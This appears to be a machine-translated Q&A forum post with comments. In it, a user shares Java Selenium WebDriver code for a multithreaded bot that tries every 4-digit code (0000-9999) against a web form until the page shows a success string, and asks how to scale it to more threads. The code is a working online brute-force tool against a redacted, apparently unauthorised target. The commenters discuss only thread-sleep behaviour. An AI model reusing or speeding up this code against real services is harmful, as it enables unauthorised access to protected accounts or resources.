everyone! 我刚刚创建了一个蛮力机器人,它使用WebDriver和多线程蛮力强制一个4位数的代码。 4位数表示范围为0000 - 9999个可能的字符串值。 就我而言,在点击“提交”按钮后,客户端从服务器得到响应之前不少于7秒。所以,我决定使用Thread.sleep(7200)让页面满载。然后,我发现我无法等待9999 * 7.5秒的任务完成,所以我不得不使用多线程。我有一台AMD四核机器,每1个硬件一个虚拟内核,这让我有机会同时运行8个线程。好吧,我已经将8999个组合的9999个组合的整个工作分开了,每个组合都有1249个组合+剩余线程的工作范围。好的,现在我在1.5小时内完成了我的工作(因为正确的代码似乎处于工作范围的中间)。这好多了,但它可能会更好!你知道,Thread.sleep(7500)纯粹是浪费时间。由于硬件核心数量有限,我的机器可能会切换到wait()
的其他线程。这个怎么做?有任何想法吗?增加基于Selenium WebDriver的多线程蛮力机器人的性能
下面是两个类来表示我的架构方法:
public class BruteforceBot extends Thread {
// All the necessary implementation, blah-blah
public void run() {
brutforce();
}
private void brutforce() {
initDriver();
int counter = start;
while (counter <= finish) {
try {
webDriver.get(gatewayURL);
webDriver.findElement(By.name("code")).sendKeys(codes.get(counter));
webDriver.findElement(By.name("code")).submit();
Thread.sleep(7200);
String textFound = "";
try {
do {
textFound = Jsoup.parse(webDriver.getPageSource()).text();
//we need to be sure that the page is fully loaded
} while (textFound.contains("XXXXXXXXXXXXX"));
} catch (org.openqa.selenium.JavascriptException je) {
System.err.println("JavascriptException: TypeError: "
+ "document.documentElement is null");
continue;
}
// Test if the page returns XXXXXXXXXXXXX below
if (textFound.contains("XXXXXXXXXXXXXXXx") && !textFound.contains("YYYYYYY")) {
System.out.println("Not " + codes.get(counter));
counter++;
// Test if the page contains "YYYYYYY" string below
} else if (textFound.contains("YYYYYYY")) {
System.out.println("Correct Code is " + codes.get(counter));
botLogger.writeTheLogToFile("We have found it: " + textFound
+ " ... at the code of " + codes.get(counter));
break;
// Test if any other case of response below
} else {
System.out.println("WTF?");
botLogger.writeTheLogToFile("Strange response for code "
+ codes.get(counter));
continue;
}
} catch (InterruptedException intrrEx) {
System.err.println("Interrupted exception: ");
intrrEx.printStackTrace();
}
}
destroyDriver();
} // end of bruteforce() method
而且
public class ThreadMaster {
// All the necessary implementation, blah-blah
public ThreadMaster(int amountOfThreadsArgument,
ArrayList<String> customCodes) {
this();
this.codes = customCodes;
this.amountOfThreads = amountOfThreadsArgument;
this.lastCodeIndex = codes.size() - 1;
this.remainderThread = codes.size() % amountOfThreads;
this.scopeOfWorkForASingleThread
= codes.size()/amountOfThreads;
}
public static void runThreads() {
do {
bots = new BruteforceBot[amountOfThreads];
System.out.println("Bots array is populated");
} while (bots.length != amountOfThreads);
for (int j = 0; j <= amountOfThreads - 1;) {
int finish = start + scopeOfWorkForASingleThread;
try {
bots[j] = new BruteforceBot(start, finish, codes);
} catch (Exception e) {
System.err.println("Putting a bot into a theads array failed");
continue;
}
bots[j].start();
start = finish;
j++;
}
try {
for (int j = 0; j <= amountOfThreads - 1; j++) {
bots[j].join();
}
} catch (InterruptedException ie) {
System.err.println("InterruptedException has occured "
+ "while a Bot was joining a thread ...");
ie.printStackTrace();
}
// if there are any codes that are still remain to be tested -
// this last bot/thread will take care of them
if (remainderThread != 0) {
try {
int remainderStart = lastCodeIndex - remainderThread;
int remainderFinish = lastCodeIndex;
BruteforceBot remainderBot
= new BruteforceBot(remainderStart, remainderFinish, codes);
remainderBot.start();
remainderBot.join();
} catch (InterruptedException ie) {
System.err.println("The remainder Bot has failed to "
+ "create or start or join a thread ...");
}
}
}
我需要你对如何改善这个应用程序的体系结构,使之与成功运行的发言权提醒, 20个线程,而不是8个。我的问题是 - 当我简单地删除Thread.sleep(7200)并同时命令运行20个线程实例而不是8个线程时,线程始终无法获得来自服务器的响应,因为它不'等待7秒钟。因此,表现不仅仅是更少,它== 0;你会选择哪种方法?
PS:我下令从main()方法的线程的数量:
public static void main(String[] args)
throws InterruptedException, org.openqa.selenium.SessionNotCreatedException {
System.setProperty("webdriver.gecko.driver", "lib/geckodriver.exe");
ThreadMaster tm = new ThreadMaster(8, new CodesGenerator().getListOfCodesFourDigits());
tm.runThreads();
'Thread.sleep(7500)是纯粹浪费时间。我的机器可能会切换到其他等待的线程()'我不明白这一点。如果一个线程选择Sleep(),操作系统会阻塞它并释放它正在运行的核心。如果另一个线程准备就绪,它将立即被分派到现在免费的内核中。如果你的线程代码中有一个Sleep(7200)调用,那么你可以运行800个线程,没问题,你也不会注意到任何放缓。 –
@MartinJames,不幸的是,'sleep()'不会释放它的resorces上的锁。这是[这里]讨论(https://stackoverflow.com/questions/1036754/difference-between-wait-and-sleep)。在Thread.sleep()期间,物理内核不会被释放,但它将执行Thread.sleep()。据我所知,只有wait()可以在这里帮助。 – Slavick
@MartinJames,你认为这是因为geckodriver.exe和chromedriver.exe都是独立的Windows程序,它们与我的Java应用程序没有多大关系,占用了我的线程?可能它不是一个Java多线程问题,而是一个Windows多进程编程问题......无论如何,我希望得到一个建议仍然存在:) – Slavick